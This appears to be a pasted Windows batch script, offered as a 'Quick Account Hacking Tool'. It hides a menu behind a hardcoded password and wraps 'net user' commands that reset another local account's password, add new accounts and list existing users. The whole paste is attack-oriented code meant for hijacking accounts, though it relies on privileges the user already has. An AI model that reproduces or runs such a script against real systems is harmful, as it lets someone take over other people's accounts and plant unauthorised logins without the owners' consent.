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a guest
Nov 15th, 2018
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  1. Code:
  2. @echo off
  3. color 1a
  4. title QAHT - Made by Ultra
  5. set /a d=0
  6. set /a cl=0
  7. set /p p=Password:
  8. if not %p%==ultra goto :wrongpassword
  9. goto :menu
  11. :wrongpassword
  12. if %cl%==0 cls
  13. set /a cl=1
  14. echo You have input the wrong password!
  15. goto :wrongpassword
  17. :menu
  19. title QAHT (Quick Account Hacking Tool) - Made by Ultra
  20. cls
  21. echo ___
  22. echo QAHT (Quick Account Hacking Tool).
  23. echo ___
  24. echo e = exit QAHT
  25. echo h = hack an account
  26. echo c = create a new account
  27. echo l = list the accounts of this computer network
  28. if %d%==0 echo d = turn debug on, you will be able to see the used commands if its on
  29. if %d%==0 echo (only recommended for advanced users/learning)
  30. if %d%==1 echo debug mode is on
  31. set /p o=:=
  32. if %o%==d set /a d=1
  33. if %o%==e exit
  34. if %o%==h goto :hack
  35. if %o%==l goto :list users
  36. if %o%==c goto :create
  37. goto :menu
  39. :create
  40. cls
  41. echo Simply make a username and a password to create a windows account.
  42. pause
  43. cls
  44. set /p u=New Username:
  45. cls
  46. set /p p=Password:
  47. net user /add %u% %p%
  48. cls
  49. if %d%==1 echo - command: net user /add %u% %p%
  50. if not %d%==1 cls
  51. echo An account with the following information should be added to this computer network now:
  52. echo -
  53. echo Username: %u%
  54. echo Password: %p%
  55. echo -
  56. echo If the account has not been added, something went wrong and the
  57. echo procedure did not work. This is most likely to be caused by
  58. echo the fact that you might not have the needed privileges on your
  59. echo current account.
  60. echo ___
  61. pause
  62. cls
  63. goto :menu
  65. :hack
  66. cls
  67. echo Type "list" to find the name of the account that you want to hack.
  68. set /p u=Hack Username:
  69. if %u%==list goto :list users
  70. cls
  71. set /p p=New Password:
  72. cls
  73. net user %u% %p%
  74. cls
  75. if %d%==1 echo - command: net user %u% %p%
  76. if not %d%==1 cls
  77. echo An account with the following information should be hacked
  78. echo on this computer network now:
  79. echo -
  80. echo Username: %u%
  81. echo Password: %p%
  82. echo -
  83. echo If the account has not been hacked, something went wrong and the
  84. echo procedure did not work. This is most likely to be caused by
  85. echo the fact that you might not have the needed privileges on your
  86. echo current account.
  87. echo ___
  88. pause
  89. cls
  90. goto :menu
  92. :list users
  93. cls
  94. echo command: net user
  95. net user
  96. echo ___
  97. pause
  98. cls
  99. goto :menu
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